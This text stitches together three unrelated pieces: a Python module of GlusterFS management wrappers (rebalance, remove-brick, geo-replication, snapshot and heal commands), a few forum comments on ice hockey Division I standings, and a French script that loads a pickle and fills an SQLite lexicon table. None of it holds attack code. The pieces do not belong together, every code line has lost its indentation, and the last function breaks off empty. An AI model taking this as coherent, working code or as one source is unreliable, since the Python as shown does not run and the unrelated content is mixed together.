def volumeRebalanceStart(volumeName, rebalanceType="", force=False):
command = _getGlusterVolCmd() + ["rebalance", volumeName]
if rebalanceType:
command.append(rebalanceType)
command.append("start")
if force:
command.append("force")
try:
xmltree = _execGlusterXml(command)
except ge.GlusterCmdFailedException as e:
raise ge.GlusterVolumeRebalanceStartFailedException(rc=e.rc,
err=e.err)
try:
return {'taskId': xmltree.find('volRebalance/task-id').text}
except _etreeExceptions:
raise ge.GlusterXmlErrorException(err=[etree.tostring(xmltree)])
@gluster_mgmt_api
def volumeRebalanceStop(volumeName, force=False):
command = _getGlusterVolCmd() + ["rebalance", volumeName, "stop"]
if force:
command.append('force')
try:
xmltree = _execGlusterXml(command)
except ge.GlusterCmdFailedException as e:
raise ge.GlusterVolumeRebalanceStopFailedException(rc=e.rc,
err=e.err)
try:
return _parseVolumeRebalanceRemoveBrickStatus(xmltree, 'rebalance')
except _etreeExceptions:
raise ge.GlusterXmlErrorException(err=[etree.tostring(xmltree)])
@gluster_mgmt_api
def _parseVolumeRebalanceRemoveBrickStatus(xmltree, mode):
"""
returns {'hosts': [{'name': NAME,
'id': UUID_STRING,
'runtime': FLOAT_AS_STRING,
'filesScanned': INT AS STRING,
'filesMoved': INT AS STRING,
'filesFailed': INT AS STRING,
'filesSkipped': INT AS STRING,
'totalSizeMoved': INT AS STRING,
'status': STRING},...]
'summary': {'runtime': FLOAT_AS_STRING,
'filesScanned': INT AS STRING,
'filesMoved': INT AS STRING,
'filesFailed': INT AS STRING,
'filesSkipped': INT AS STRING,
'totalSizeMoved': INT AS STRING,
'status': STRING}}
"""
if mode == 'rebalance':
tree = xmltree.find('volRebalance')
elif mode == 'remove-brick':
tree = xmltree.find('volRemoveBrick')
else:
return
st = tree.find('aggregate/statusStr').text
statusStr = st.replace(' ', '_').replace('-', '_')
status = {
'summary': {
'runtime': tree.find('aggregate/runtime').text,
'filesScanned': tree.find('aggregate/lookups').text,
'filesMoved': tree.find('aggregate/files').text,
'filesFailed': tree.find('aggregate/failures').text,
'filesSkipped': tree.find('aggregate/skipped').text,
'totalSizeMoved': tree.find('aggregate/size').text,
'status': statusStr.upper()},
'hosts': []}
for el in tree.findall('node'):
st = el.find('statusStr').text
statusStr = st.replace(' ', '_').replace('-', '_')
status['hosts'].append({'name': el.find('nodeName').text,
'id': el.find('id').text,
'runtime': el.find('runtime').text,
'filesScanned': el.find('lookups').text,
'filesMoved': el.find('files').text,
'filesFailed': el.find('failures').text,
'filesSkipped': el.find('skipped').text,
'totalSizeMoved': el.find('size').text,
'status': statusStr.upper()})
return status
@gluster_mgmt_api
def volumeRebalanceStatus(volumeName):
command = _getGlusterVolCmd() + ["rebalance", volumeName, "status"]
try:
xmltree = _execGlusterXml(command)
except ge.GlusterCmdFailedException as e:
raise ge.GlusterVolumeRebalanceStatusFailedException(rc=e.rc,
err=e.err)
try:
return _parseVolumeRebalanceRemoveBrickStatus(xmltree, 'rebalance')
except _etreeExceptions:
raise ge.GlusterXmlErrorException(err=[etree.tostring(xmltree)])
@gluster_mgmt_api
def volumeReplaceBrickCommitForce(volumeName, existingBrick, newBrick):
command = _getGlusterVolCmd() + ["replace-brick", volumeName,
existingBrick, newBrick, "commit",
"force"]
try:
_execGlusterXml(command)
return True
except ge.GlusterCmdFailedException as e:
raise ge.GlusterVolumeReplaceBrickCommitForceFailedException(rc=e.rc,
err=e.err)
@gluster_mgmt_api
def volumeRemoveBrickStart(volumeName, brickList, replicaCount=0):
command = _getGlusterVolCmd() + ["remove-brick", volumeName]
if replicaCount:
command += ["replica", "%s" % replicaCount]
command += brickList + ["start"]
try:
xmltree = _execGlusterXml(command)
except ge.GlusterCmdFailedException as e:
raise ge.GlusterVolumeRemoveBrickStartFailedException(rc=e.rc,
err=e.err)
try:
return {'taskId': xmltree.find('volRemoveBrick/task-id').text}
except _etreeExceptions:
raise ge.GlusterXmlErrorException(err=[etree.tostring(xmltree)])
@gluster_mgmt_api
def volumeRemoveBrickStop(volumeName, brickList, replicaCount=0):
command = _getGlusterVolCmd() + ["remove-brick", volumeName]
if replicaCount:
command += ["replica", "%s" % replicaCount]
command += brickList + ["stop"]
try:
xmltree = _execGlusterXml(command)
except ge.GlusterCmdFailedException as e:
raise ge.GlusterVolumeRemoveBrickStopFailedException(rc=e.rc,
err=e.err)
try:
return _parseVolumeRebalanceRemoveBrickStatus(xmltree, 'remove-brick')
except _etreeExceptions:
raise ge.GlusterXmlErrorException(err=[etree.tostring(xmltree)])
@gluster_mgmt_api
def volumeRemoveBrickStatus(volumeName, brickList, replicaCount=0):
command = _getGlusterVolCmd() + ["remove-brick", volumeName]
if replicaCount:
command += ["replica", "%s" % replicaCount]
command += brickList + ["status"]
try:
xmltree = _execGlusterXml(command)
except ge.GlusterCmdFailedException as e:
raise ge.GlusterVolumeRemoveBrickStatusFailedException(rc=e.rc,
err=e.err)
try:
return _parseVolumeRebalanceRemoveBrickStatus(xmltree, 'remove-brick')
except _etreeExceptions:
raise ge.GlusterXmlErrorException(err=[etree.tostring(xmltree)])
@gluster_mgmt_api
def volumeRemoveBrickCommit(volumeName, brickList, replicaCount=0):
command = _getGlusterVolCmd() + ["remove-brick", volumeName]
if replicaCount:
command += ["replica", "%s" % replicaCount]
command += brickList + ["commit"]
try:
_execGlusterXml(command)
return True
except ge.GlusterCmdFailedException as e:
raise ge.GlusterVolumeRemoveBrickCommitFailedException(rc=e.rc,
err=e.err)
@gluster_mgmt_api
def volumeRemoveBrickForce(volumeName, brickList, replicaCount=0):
command = _getGlusterVolCmd() + ["remove-brick", volumeName]
if replicaCount:
command += ["replica", "%s" % replicaCount]
command += brickList + ["force"]
try:
_execGlusterXml(command)
return True
except ge.GlusterCmdFailedException as e:
raise ge.GlusterVolumeRemoveBrickForceFailedException(rc=e.rc,
err=e.err)
@gluster_mgmt_api
def peerProbe(hostName):
command = _getGlusterPeerCmd() + ["probe", hostName]
try:
_execGlusterXml(command)
return True
except ge.GlusterCmdFailedException as e:
raise ge.GlusterHostAddFailedException(rc=e.rc, err=e.err)
@gluster_mgmt_api
def peerDetach(hostName, force=False):
command = _getGlusterPeerCmd() + ["detach", hostName]
if force:
command.append('force')
try:
_execGlusterXml(command)
return True
except ge.GlusterCmdFailedException as e:
if e.rc == 2:
raise ge.GlusterHostNotFoundException(rc=e.rc, err=e.err)
else:
raise ge.GlusterHostRemoveFailedException(rc=e.rc, err=e.err)
def _parsePeerStatus(tree, gHostName, gUuid, gStatus):
hostList = [{'hostname': gHostName,
'uuid': gUuid,
'status': gStatus}]
for el in tree.findall('peerStatus/peer'):
if el.find('state').text != '3':
status = HostStatus.UNKNOWN
elif el.find('connected').text == '1':
status = HostStatus.CONNECTED
else:
status = HostStatus.DISCONNECTED
hostList.append({'hostname': el.find('hostname').text,
'uuid': el.find('uuid').text,
'status': status})
return hostList
@gluster_mgmt_api
def peerStatus():
"""
Returns:
[{'hostname': HOSTNAME, 'uuid': UUID, 'status': STATE}, ...]
"""
command = _getGlusterPeerCmd() + ["status"]
try:
xmltree = _execGlusterXml(command)
except ge.GlusterCmdFailedException as e:
raise ge.GlusterHostsListFailedException(rc=e.rc, err=e.err)
try:
return _parsePeerStatus(xmltree,
_getLocalIpAddress() or _getGlusterHostName(),
hostUUIDGet(), HostStatus.CONNECTED)
except _etreeExceptions:
raise ge.GlusterXmlErrorException(err=[etree.tostring(xmltree)])
@gluster_mgmt_api
def volumeProfileStart(volumeName):
command = _getGlusterVolCmd() + ["profile", volumeName, "start"]
try:
_execGlusterXml(command)
except ge.GlusterCmdFailedException as e:
raise ge.GlusterVolumeProfileStartFailedException(rc=e.rc, err=e.err)
return True
@gluster_mgmt_api
def volumeProfileStop(volumeName):
command = _getGlusterVolCmd() + ["profile", volumeName, "stop"]
try:
_execGlusterXml(command)
except ge.GlusterCmdFailedException as e:
raise ge.GlusterVolumeProfileStopFailedException(rc=e.rc, err=e.err)
return True
@gluster_mgmt_api
def volumeProfileInfo(volumeName, nfs=False):
"""
Returns:
When nfs=True:
{'volumeName': VOLUME-NAME,
'nfsServers': [
{'nfs': SERVER-NAME,
'cumulativeStats': {'blockStats': [{'size': int,
'read': int,
'write': int}, ...],
'fopStats': [{'name': FOP-NAME,
'hits': int,
'latencyAvg': float,
'latencyMin': float,
'latencyMax': float}, ...],
'duration': int,
'totalRead': int,
'totalWrite': int},
'intervalStats': {'blockStats': [{'size': int,
'read': int,
'write': int}, ...],
'fopStats': [{'name': FOP-NAME,
'hits': int,
'latencyAvg': float,
'latencyMin': float,
'latencyMax': float}, ...],
'duration': int,
'totalRead': int,
'totalWrite': int}}, ...]}
When nfs=False:
{'volumeName': VOLUME-NAME,
'bricks': [
{'brick': BRICK-NAME,
'cumulativeStats': {'blockStats': [{'size': int,
'read': int,
'write': int}, ...],
'fopStats': [{'name': FOP-NAME,
'hits': int,
'latencyAvg': float,
'latencyMin': float,
'latencyMax': float}, ...],
'duration': int,
'totalRead': int,
'totalWrite': int},
'intervalStats': {'blockStats': [{'size': int,
'read': int,
'write': int}, ...],
'fopStats': [{'name': FOP-NAME,
'hits': int,
'latencyAvg': float,
'latencyMin': float,
'latencyMax': float}, ...],
'duration': int,
'totalRead': int,
'totalWrite': int}}, ...]}
"""
command = _getGlusterVolCmd() + ["profile", volumeName, "info"]
if nfs:
command += ["nfs"]
try:
xmltree = _execGlusterXml(command)
except ge.GlusterCmdFailedException as e:
raise ge.GlusterVolumeProfileInfoFailedException(rc=e.rc, err=e.err)
try:
return _parseVolumeProfileInfo(xmltree, nfs)
except _etreeExceptions:
raise ge.GlusterXmlErrorException(err=[etree.tostring(xmltree)])
def _parseVolumeTasks(tree):
"""
returns {TaskId: {'volumeName': VolumeName,
'taskType': TaskType,
'status': STATUS,
'bricks': BrickList}, ...}
"""
tasks = {}
for el in tree.findall('volStatus/volumes/volume'):
volumeName = el.find('volName').text
for c in el.findall('tasks/task'):
taskType = c.find('type').text
taskType = taskType.upper().replace('-', '_').replace(' ', '_')
taskId = c.find('id').text
bricks = []
if taskType == TaskType.REPLACE_BRICK:
bricks.append(c.find('params/srcBrick').text)
bricks.append(c.find('params/dstBrick').text)
elif taskType == TaskType.REMOVE_BRICK:
for b in c.findall('params/brick'):
bricks.append(b.text)
elif taskType == TaskType.REBALANCE:
pass
statusStr = c.find('statusStr').text.upper() \
.replace('-', '_') \
.replace(' ', '_')
tasks[taskId] = {'volumeName': volumeName,
'taskType': taskType,
'status': statusStr,
'bricks': bricks}
return tasks
@gluster_mgmt_api
def volumeTasks(volumeName="all"):
command = _getGlusterVolCmd() + ["status", volumeName, "tasks"]
try:
xmltree = _execGlusterXml(command)
except ge.GlusterCmdFailedException as e:
raise ge.GlusterVolumeTasksFailedException(rc=e.rc, err=e.err)
try:
return _parseVolumeTasks(xmltree)
except _etreeExceptions:
raise ge.GlusterXmlErrorException(err=[etree.tostring(xmltree)])
@gluster_mgmt_api
def volumeGeoRepSessionStart(volumeName, remoteHost, remoteVolumeName,
remoteUserName=None, force=False):
if remoteUserName:
userAtHost = "%s@%s" % (remoteUserName, remoteHost)
else:
userAtHost = remoteHost
command = _getGlusterVolGeoRepCmd() + [volumeName, "%s::%s" % (
userAtHost, remoteVolumeName), "start"]
if force:
command.append('force')
try:
_execGlusterXml(command)
return True
except ge.GlusterCmdFailedException as e:
raise ge.GlusterVolumeGeoRepSessionStartFailedException(rc=e.rc,
err=e.err)
@gluster_mgmt_api
def volumeGeoRepSessionStop(volumeName, remoteHost, remoteVolumeName,
remoteUserName=None, force=False):
if remoteUserName:
userAtHost = "%s@%s" % (remoteUserName, remoteHost)
else:
userAtHost = remoteHost
command = _getGlusterVolGeoRepCmd() + [volumeName, "%s::%s" % (
userAtHost, remoteVolumeName), "stop"]
if force:
command.append('force')
try:
_execGlusterXml(command)
return True
except ge.GlusterCmdFailedException as e:
raise ge.GlusterVolumeGeoRepSessionStopFailedException(rc=e.rc,
err=e.err)
def _parseGeoRepStatus(tree):
"""
Returns:
{volume-name: [{sessionKey: 'key to identify the session',
remoteVolumeName: 'volume in remote gluster cluster'
bricks: [{host: 'local node',
hostUuid: 'uuid of brick host',
brickName: 'brick in the local volume',
remoteHost: 'slave',
status: 'status'
remoteUserName: 'root'
timeZone: 'nodes time zone'
crawlStatus: 'crawlStatus'
lastSynced: 'last synced time'
entry: 'nos of entry operations pending'
data: 'nos of data operations pending'
meta: 'nos of meta operations pending'
failures: 'nos of failures'
checkpointTime: 'checkpoint set time'
checkpointCompletionTime: 'checkpoint completion
time'
checkpointCompleted: 'yes/no'}]...
]....
}
"""
status = {}
for volume in tree.findall('geoRep/volume'):
sessions = []
volumeDetail = {}
for session in volume.findall('sessions/session'):
pairs = []
sessionDetail = {}
sessionDetail['sessionKey'] = session.find('session_slave').text
sessionDetail['remoteVolumeName'] = sessionDetail[
'sessionKey'].split("::")[-1].split(":")[0]
for pair in session.findall('pair'):
pairDetail = {}
pairDetail['host'] = pair.find('master_node').text
pairDetail['hostUuid'] = pair.find(
'master_node_uuid').text
pairDetail['brickName'] = pair.find('master_brick').text
pairDetail['remoteHost'] = pair.find('slave_node').text
pairDetail['remoteUserName'] = pair.find('slave_user').text
pairDetail['status'] = pair.find('status').text
pairDetail['crawlStatus'] = pair.find('crawl_status').text
pairDetail['timeZone'] = _TIME_ZONE
pairDetail['lastSynced'] = pair.find('last_synced').text
if pairDetail['lastSynced'] != 'N/A':
pairDetail['lastSynced'] = calendar.timegm(
time.strptime(pairDetail['lastSynced'],
"%Y-%m-%d %H:%M:%S"))
pairDetail['checkpointTime'] = pair.find(
'checkpoint_time').text
if pairDetail['checkpointTime'] != 'N/A':
pairDetail['checkpointTime'] = calendar.timegm(
time.strptime(pairDetail['checkpointTime'],
"%Y-%m-%d %H:%M:%S"))
pairDetail['checkpointCompletionTime'] = pair.find(
'checkpoint_completion_time').text
if pairDetail['checkpointCompletionTime'] != 'N/A':
pairDetail['checkpointCompletionTime'] = calendar.timegm(
time.strptime(pairDetail['checkpointCompletionTime'],
"%Y-%m-%d %H:%M:%S"))
pairDetail['entry'] = pair.find('entry').text
pairDetail['data'] = pair.find('data').text
pairDetail['meta'] = pair.find('meta').text
pairDetail['failures'] = pair.find('failures').text
pairDetail['checkpointCompleted'] = pair.find(
'checkpoint_completed').text
pairs.append(pairDetail)
sessionDetail['bricks'] = pairs
sessions.append(sessionDetail)
volumeDetail['sessions'] = sessions
status[volume.find('name').text] = volumeDetail
return status
@gluster_mgmt_api
def volumeGeoRepStatus(volumeName=None, remoteHost=None,
remoteVolumeName=None, remoteUserName=None):
if remoteUserName:
userAtHost = "%s@%s" % (remoteUserName, remoteHost)
else:
userAtHost = remoteHost
command = _getGlusterVolGeoRepCmd()
if volumeName:
command.append(volumeName)
if remoteHost and remoteVolumeName:
command.append("%s::%s" % (userAtHost, remoteVolumeName))
command.append("status")
try:
xmltree = _execGlusterXml(command)
except ge.GlusterCmdFailedException as e:
raise ge.GlusterGeoRepStatusFailedException(rc=e.rc, err=e.err)
try:
return _parseGeoRepStatus(xmltree)
except _etreeExceptions:
raise ge.GlusterXmlErrorException(err=[etree.tostring(xmltree)])
@gluster_mgmt_api
def volumeGeoRepSessionPause(volumeName, remoteHost, remoteVolumeName,
remoteUserName=None, force=False):
if remoteUserName:
userAtHost = "%s@%s" % (remoteUserName, remoteHost)
else:
userAtHost = remoteHost
command = _getGlusterVolGeoRepCmd() + [volumeName, "%s::%s" % (
userAtHost, remoteVolumeName), "pause"]
if force:
command.append('force')
try:
_execGlusterXml(command)
return True
except ge.GlusterCmdFailedException as e:
raise ge.GlusterVolumeGeoRepSessionPauseFailedException(rc=e.rc,
err=e.err)
@gluster_mgmt_api
def volumeGeoRepSessionResume(volumeName, remoteHost, remoteVolumeName,
remoteUserName=None, force=False):
if remoteUserName:
userAtHost = "%s@%s" % (remoteUserName, remoteHost)
else:
userAtHost = remoteHost
command = _getGlusterVolGeoRepCmd() + [volumeName, "%s::%s" % (
userAtHost, remoteVolumeName), "resume"]
if force:
command.append('force')
try:
_execGlusterXml(command)
return True
except ge.GlusterCmdFailedException as e:
raise ge.GlusterVolumeGeoRepSessionResumeFailedException(rc=e.rc,
err=e.err)
def _parseVolumeGeoRepConfig(tree):
"""
Returns:
{geoRepConfig:{'optionName': 'optionValue',...}
}
"""
conf = tree.find('geoRep/config')
config = {}
for child in conf.getchildren():
config[child.tag] = child.text
return {'geoRepConfig': config}
@gluster_mgmt_api
def volumeGeoRepConfig(volumeName, remoteHost,
remoteVolumeName, optionName=None,
optionValue=None,
remoteUserName=None):
if remoteUserName:
userAtHost = "%s@%s" % (remoteUserName, remoteHost)
else:
userAtHost = remoteHost
command = _getGlusterVolGeoRepCmd() + [volumeName, "%s::%s" % (
userAtHost, remoteVolumeName), "config"]
if optionName and optionValue:
command += [optionName, optionValue]
elif optionName:
command += ["!%s" % optionName]
try:
xmltree = _execGlusterXml(command)
if optionName:
return True
except ge.GlusterCmdFailedException as e:
raise ge.GlusterGeoRepConfigFailedException(rc=e.rc, err=e.err)
try:
return _parseVolumeGeoRepConfig(xmltree)
except _etreeExceptions:
raise ge.GlusterXmlErrorException(err=[etree.tostring(xmltree)])
@gluster_mgmt_api
def snapshotCreate(volumeName, snapName,
snapDescription=None,
force=False):
command = _getGlusterSnapshotCmd() + ["create", snapName, volumeName]
if snapDescription:
command += ['description', snapDescription]
if force:
command.append('force')
try:
xmltree = _execGlusterXml(command)
except ge.GlusterCmdFailedException as e:
raise ge.GlusterSnapshotCreateFailedException(rc=e.rc, err=e.err)
try:
return {'uuid': xmltree.find('snapCreate/snapshot/uuid').text,
'name': xmltree.find('snapCreate/snapshot/name').text}
except _etreeExceptions:
raise ge.GlusterXmlErrorException(err=[etree.tostring(xmltree)])
@gluster_mgmt_api
def snapshotDelete(volumeName=None, snapName=None):
command = _getGlusterSnapshotCmd() + ["delete"]
if snapName:
command.append(snapName)
elif volumeName:
command += ["volume", volumeName]
# xml output not used because of BZ:1161416 in gluster cli
rc, out, err = _execGluster(command)
if rc:
raise ge.GlusterSnapshotDeleteFailedException(rc, out, err)
else:
return True
@gluster_mgmt_api
def snapshotActivate(snapName, force=False):
command = _getGlusterSnapshotCmd() + ["activate", snapName]
if force:
command.append('force')
try:
_execGlusterXml(command)
return True
except ge.GlusterCmdFailedException as e:
raise ge.GlusterSnapshotActivateFailedException(rc=e.rc, err=e.err)
@gluster_mgmt_api
def snapshotDeactivate(snapName):
command = _getGlusterSnapshotCmd() + ["deactivate", snapName]
try:
_execGlusterXml(command)
return True
except ge.GlusterCmdFailedException as e:
raise ge.GlusterSnapshotDeactivateFailedException(rc=e.rc, err=e.err)
def _parseRestoredSnapshot(tree):
"""
returns {'volumeName': 'vol1',
'volumeUuid': 'uuid',
'snapshotName': 'snap2',
'snapshotUuid': 'uuid'
}
"""
snapshotRestore = {}
snapshotRestore['volumeName'] = tree.find('snapRestore/volume/name').text
snapshotRestore['volumeUuid'] = tree.find('snapRestore/volume/uuid').text
snapshotRestore['snapshotName'] = tree.find(
'snapRestore/snapshot/name').text
snapshotRestore['snapshotUuid'] = tree.find(
'snapRestore/snapshot/uuid').text
return snapshotRestore
@gluster_mgmt_api
def snapshotRestore(snapName):
command = _getGlusterSnapshotCmd() + ["restore", snapName]
try:
xmltree = _execGlusterXml(command)
except ge.GlusterCmdFailedException as e:
raise ge.GlusterSnapshotRestoreFailedException(rc=e.rc, err=e.err)
try:
return _parseRestoredSnapshot(xmltree)
except _etreeExceptions:
raise ge.GlusterXmlErrorException(err=[etree.tostring(xmltree)])
def _parseSnapshotConfigList(tree):
"""
returns {'system':{'snap-max-hard-limit': 'hardlimit',
'snap-max-soft-limit': 'softLimit',
'auto-delete': 'enable/disable',
'activate-on-create': 'enable/disable'},
'volume':{'name' :
{'snap-max-hard-limit: 'hardlimit'}
}
}
"""
systemConfig = {}
systemConfig['snap-max-hard-limit'] = tree.find(
'snapConfig/systemConfig/hardLimit').text
systemConfig['snap-max-soft-limit'] = tree.find(
'snapConfig/systemConfig/softLimit').text
systemConfig['auto-delete'] = tree.find(
'snapConfig/systemConfig/autoDelete').text
systemConfig['activate-on-create'] = tree.find(
'snapConfig/systemConfig/activateOnCreate').text
volumeConfig = {}
for el in tree.findall('snapConfig/volumeConfig/volume'):
config = {}
volumeName = el.find('name').text
config['snap-max-hard-limit'] = el.find('effectiveHardLimit').text
volumeConfig[volumeName] = config
return {'system': systemConfig, 'volume': volumeConfig}
@gluster_mgmt_api
def snapshotConfig(volumeName=None, optionName=None, optionValue=None):
command = _getGlusterSnapshotCmd() + ["config"]
if volumeName:
command.append(volumeName)
if optionName and optionValue:
command += [optionName, optionValue]
try:
xmltree = _execGlusterXml(command)
if optionName and optionValue:
return
except ge.GlusterCmdFailedException as e:
raise ge.GlusterSnapshotConfigFailedException(rc=e.rc, err=e.err)
try:
return _parseSnapshotConfigList(xmltree)
except _etreeExceptions:
raise ge.GlusterXmlErrorException(err=[etree.tostring(xmltree)])
def _parseVolumeSnapshotList(tree):
"""
{'v1': {'snapshots': [{'name': 'snap1_v1',
'description': description of the snapshot,
'id': '8add41ae-c60c-4023'
'-a1a6-5093a5d35603',
'createTime': {'timeZone': 'IST',
'epochTime': 1414427114}
'snapVolume': '5eeaf23def3f446d898e1de8461a6aa7'
'snapVolumeStatus': 'ACTIVATED'}, ...],
'snapRemaining': 252}
}
"""
volume = {}
volumeName = tree.find(
'snapInfo/originVolume/name').text
volume[volumeName] = {
'snapRemaining': tree.find('snapInfo/originVolume/snapRemaining').text,
'snapshots': []
}
if int(tree.find('snapInfo/count').text) == 0:
return {}
for el in tree.findall('snapInfo/snapshots/snapshot'):
snapshot = {}
snapshot['id'] = el.find('uuid').text
snapshot['description'] = "" if el.find('description') is None \
else el.find('description').text
snapshot['createTime'] = {
'epochTime': calendar.timegm(
time.strptime(el.find('createTime').text,
"%Y-%m-%d %H:%M:%S")
),
'timeZone': _TIME_ZONE
}
snapshot['snapVolume'] = el.find('snapVolume/name').text
status = el.find('snapVolume/status').text
if status.upper() == 'STARTED':
snapshot['snapVolumeStatus'] = SnapshotStatus.ACTIVATED
else:
snapshot['snapVolumeStatus'] = SnapshotStatus.DEACTIVATED
snapshot['name'] = el.find('name').text
volume[volumeName]['snapshots'].append(snapshot)
return volume
def _parseAllVolumeSnapshotList(tree):
"""
{'v1': {'snapshots': [{'name': 'snap1_v1',
'description': description of the snapshot,
'id': '8add41ae-c60c-4023-'
'a1a6-5093a5d35603',
'createTime': {'timeZone': 'IST',
'epochTime': 141442711}
'snapVolume': '5eeaf23def3f446d898e1de8461a6aa7'
'snapVolumeStatus': 'ACTIVATED'}, ...],
'snapRemaining': 252},
'v2': {'snapshots': [{'name': 'snap1_v2',
'description': description of the snapshot,
'id': '8add41ae-c60c-4023'
'-a1a6-1233a5d35603',
'createTime': {'timeZone': 'IST',
'epochTime': 1414427114}
'snapVolume': '5eeaf23def3f446d898e1123461a6aa7'
'snapVolumeStatus': 'DEACTIVATED'}, ...],
'snapRemaining': 252},...
}
"""
volumes = {}
if int(tree.find('snapInfo/count').text) == 0:
return {}
for el in tree.findall('snapInfo/snapshots/snapshot'):
snapshot = {}
snapshot['id'] = el.find('uuid').text
snapshot['description'] = "" if el.find('description') is None \
else el.find('description').text
snapshot['createTime'] = {
'epochTime': calendar.timegm(
time.strptime(el.find('createTime').text,
"%Y-%m-%d %H:%M:%S")
),
'timeZone': _TIME_ZONE
}
snapshot['snapVolumeName'] = el.find('snapVolume/name').text
status = el.find('snapVolume/status').text
if status.upper() == 'STARTED':
snapshot['snapVolumeStatus'] = SnapshotStatus.ACTIVATED
else:
snapshot['snapVolumeStatus'] = SnapshotStatus.DEACTIVATED
snapshot['name'] = el.find('name').text
volumeName = el.find('snapVolume/originVolume/name').text
if volumeName not in volumes:
volumes[volumeName] = {
'snapRemaining': el.find(
'snapVolume/originVolume/snapRemaining').text,
'snapshots': []
}
volumes[volumeName]['snapshots'].append(snapshot)
return volumes
@gluster_mgmt_api
def snapshotInfo(volumeName=None):
command = _getGlusterSnapshotCmd() + ["info"]
if volumeName:
command += ["volume", volumeName]
try:
xmltree = _execGlusterXml(command)
except ge.GlusterCmdFailedException as e:
raise ge.GlusterSnapshotInfoFailedException(rc=e.rc, err=e.err)
try:
if volumeName:
return _parseVolumeSnapshotList(xmltree)
else:
return _parseAllVolumeSnapshotList(xmltree)
except _etreeExceptions:
raise ge.GlusterXmlErrorException(err=[etree.tostring(xmltree)])
@gluster_mgmt_api
def executeGsecCreate():
command = _getGlusterSystemCmd() + ["execute", "gsec_create"]
rc, out, err = _execGluster(command)
if rc:
raise ge.GlusterGeoRepPublicKeyFileCreateFailedException(rc,
out, err)
return True
@gluster_mgmt_api
def executeMountBrokerUserAdd(remoteUserName, remoteVolumeName):
command = _getGlusterSystemCmd() + ["execute", "mountbroker",
"user", remoteUserName,
remoteVolumeName]
rc, out, err = _execGluster(command)
if rc:
raise ge.GlusterGeoRepExecuteMountBrokerUserAddFailedException(rc,
out,
err)
return True
@gluster_mgmt_api
def executeMountBrokerOpt(optionName, optionValue):
command = _getGlusterSystemCmd() + ["execute", "mountbroker",
"opt", optionName,
optionValue]
rc, out, err = _execGluster(command)
if rc:
raise ge.GlusterGeoRepExecuteMountBrokerOptFailedException(rc,
out, err)
return True
@gluster_mgmt_api
def volumeGeoRepSessionCreate(volumeName, remoteHost,
remoteVolumeName,
remoteUserName=None, force=False):
if remoteUserName:
userAtHost = "%s@%s" % (remoteUserName, remoteHost)
else:
userAtHost = remoteHost
command = _getGlusterVolCmd() + ["geo-replication", volumeName,
"%s::%s" % (userAtHost, remoteVolumeName),
"create", "no-verify"]
if force:
command.append('force')
try:
_execGlusterXml(command)
return True
except ge.GlusterCmdFailedException as e:
raise ge.GlusterGeoRepSessionCreateFailedException(rc=e.rc, err=e.err)
@gluster_mgmt_api
def volumeGeoRepSessionDelete(volumeName, remoteHost, remoteVolumeName,
remoteUserName=None):
if remoteUserName:
userAtHost = "%s@%s" % (remoteUserName, remoteHost)
else:
userAtHost = remoteHost
command = _getGlusterVolCmd() + ["geo-replication", volumeName,
"%s::%s" % (userAtHost, remoteVolumeName),
"delete"]
try:
_execGlusterXml(command)
return True
except ge.GlusterCmdFailedException as e:
raise ge.GlusterGeoRepSessionDeleteFailedException(rc=e.rc, err=e.err)
@gluster_mgmt_api
def volumeHealInfo(volumeName=None):
command = _getGlusterVolCmd() + ["heal", volumeName, 'info']
try:
xmltree = _execGlusterXml(command)
return _parseVolumeHealInfo(xmltree)
except ge.GlusterCmdFailedException as e:
raise ge.GlusterVolumeHealInfoFailedException(rc=e.rc, err=e.err)
except _etreeExceptions:
raise ge.GlusterXmlErrorException(err=[etree.tostring(xmltree)])
def _parseVolumeHealInfo(tree):
"""
{'bricks': [{'name': 'Fully qualified brick path',
'status': 'Connected/Not Connected'
'numberOfEntries': int,
'hostUuid': 'UUID'},...]
}
"""
healInfo = {'bricks': []}
for el in tree.findall('healInfo/bricks/brick'):
brick = {}
brick['name'] = el.find('name').text
brick['status'] = el.find('status').text
brick['hostUuid'] = el.get('hostUuid')
if brick['status'] == 'Connected':
brick['numberOfEntries'] = el.find('numberOfEntries').text
healInfo['bricks'].append(brick)
return healInfo
def exists():
try:
return os.path.exists(_glusterCommandPath.cmd)
except OSError as e:
if e.errno != os.errno.ENOENT:
raise
return False
|
So, how expected we'll have any coverage in Italy.. amazing.
Japan beat Estonia in the opening game of the I B division 2-1 in Overtime, nice and valuable point for Estonia too after a hard fight against the fav of the match.
GB at the same time surprisingly leading 2-1 against Slovenia after two periods in Div I A !
1. ex aequo Lithuania and Ukraine 3 pts, 3. Japan 2 pts, 4. Estonia 1 pt, 5. ex aequo Croatia and Romania 0 pts.
Unexpected victory, good job guys..
Un Expected victory, good job guys..
1. Kazakhstan 3 pts, 2. ex aequo Great Britain and Italy 3 pts, 4. ex aequo Poland and Slovenia 0 pts, 6. Hungary 0 pts.
|
# coding: utf-8
def fonction(lex_name, number_name):
import codecs
import pickle
numbers = pickle.load(open(number_name+'.pickle', 'rb')).get('français')
with codecs.open(lex_name, 'r', 'utf-8') as f:
f.readline()
# yield tuple([x.split('_')[1] for x in f.readline().strip().split('\t')]+["isinteger", "integer"])
for line in f:
tmp1 = [(0, "")]
tmp2 = line.strip().split('\t')
if tmp2[3] == "ADJ:num" or tmp2[0] in ["million", "milliard", "zéro"]:
tmp1 = [(1, number) for number in numbers if (
(
tmp2[0] == numbers.get(number).get('graphie')
) and (
tmp2[1] == numbers.get(number).get('phonologie')
)
)]
if not tmp1:
tmp1 = [(0, "")]
yield tuple(line.split("\t"))+tmp1[0]
def main():
import sqlite3
tmp = fonction("Lexique381.txt", "exceptions")
with sqlite3.connect('Lexique.db') as conn:
cursor = conn.cursor()
cursor.execute("""CREATE TABLE Lexique (
ortho STRING,
phon STRING,
lemme STRING,
cgram STRING,
genre STRING,
nombre STRING,
freqlemfilms2 STRING,
freqlemlivres STRING,
freqfilms2 STRING,
freqlivres STRING,
infover STRNG,
nbhomogr STRING,
nbhomoph STRING,
islem STRING,
nblettres STRING,
nbphons STRING,
cvcv STRING,
p STRING,
voisorth STRING,
voisphon STRING,
puorth STRING,
puphon STRING,
syll STRING,
nbsyll STRING,
cv_cv STRING,
orthrenv STRING,
phonrenv STRING,
orthosyll STRING,
cgramortho STRING,
deflem STRING,
defobs STRING,
old20 STRING,
pld20 STRING,
morphoder STRING,
nbmorph STRING,
isinteger STRING,
integer STRING
)""")
cursor.executemany(
'''INSERT INTO Lexique VALUES (
?,?,?,?,?,
?,?,?,?,?,
?,?,?,?,?,
?,?,?,?,?,
?,?,?,?,?,
?,?,?,?,?,
?,?,?,?,?,
?,?)''', tmp)
conn.commit()
def main2():
